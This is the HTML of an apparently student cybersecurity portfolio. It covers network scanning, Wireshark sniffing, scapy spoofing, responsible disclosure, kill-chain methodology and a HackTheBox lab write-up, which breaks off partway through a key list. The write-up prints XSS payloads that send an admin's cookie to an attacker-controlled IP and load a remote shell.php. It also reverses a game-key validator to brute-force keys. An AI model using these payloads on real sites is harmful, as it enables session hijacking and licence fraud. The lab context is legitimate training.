          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
